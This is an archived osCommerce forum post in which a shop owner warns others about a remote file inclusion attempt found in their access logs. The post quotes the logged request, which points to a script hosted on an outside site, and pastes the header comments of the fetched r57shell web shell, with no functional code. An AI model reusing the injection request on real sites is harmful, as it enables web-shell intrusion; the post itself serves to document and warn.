Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Warning: a new attack seen today


klktrk

Recommended Posts

going through my access logs today, I saw this:

http://www.mysite.com/shop/index.php?cPath...m/aLiiF.txt?cmd

 

The double ? mark, as well as the URL alerted me to something not good going on. So I went to the site http://medan-irc.com/aLiif.txt and saw a pretty full-fledged attack script posted. It looks to my untrained eye that it is designed to cause a buffer overflow and then grab data from the database.

 

I assume MS2 sites are probably not vulnerable to this attack, but wanted to document it here, in case anyone sees anything similar, or in case this is entirely new to the community.

 

I don't want to spread the attack script, so I'll just paste in the first few lines of it as a "signature." I have a copy of it downloaded for record keeping. I wrote to the hosting company that hosts the attacker's site and alerted them to the issue.

 

First 35 lines of the attack script:

<?php
/********************************************************************************
**********************/
/*
/*                          #           #    #        #    #          #
/*                          #           #   #          #   #          #
/*                          #          #    #          #    #         # 
/*                          #          #   ##   ####   ##   #         #
/*                          #       # ##   ##  #    #  ##   ## #      #
/*                          #       # ##   ##  #    #  ##   ## #      #
/*                          #       ####   ##   #  #   ##   ####      #
/*                          #         ###   ############   ###        #
/*                          #         ##########    ##########        # 
/*                          #              ######  ######             # 
/*                          #       ######## ## #### ## #######       #
/*                          #      ###   ##  ####  ####  ##   ###     #
/*                          #      ###   ##  ##  ##  ##  ##   ###     #
/*                          #       ###   #  ## #### ##  #   ###      #
/*                          #       ###   ##  ## ## ##  ##   ###      # 
/*                          #        ##    #   ##  ##   #    ##       #
/*                          #         ##   #    ####   #    ##        #
/*                          #          ##                  ##         #
/*
/*
/*
/*  r57shell.php - ������ �� ��� ����������� ��� ��������� ��������� ������� �� ������� ����� �������
/*  �� ������ ������� ����� ������ �� ����� �����: [url="http://rst.void.ru"]http://rst.void.ru[/url]
/*  ������: 1.3 (05.03.2006)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~*/
/*  ��������� ������������� �� ������ � ����: blf, phoenix, virus, NorD � ���� ������ �� RST/GHC.
/*  ���� � ��� ���� �����-���� ���� �� ������ ���� ����� ������� ������� �������� � ������ �� ������
/*  �� [email protected]. ��� ����������� ����� �����������.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~*/
/*  ©oded by 1dt.w0lf
/*  RST/GHC [url="http://rst.void.ru"]http://rst.void.ru[/url] , [url="http://ghc.ru"]http://ghc.ru[/url]
/*  ANY MODIFIED REPUBLISHING IS RESTRICTED

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...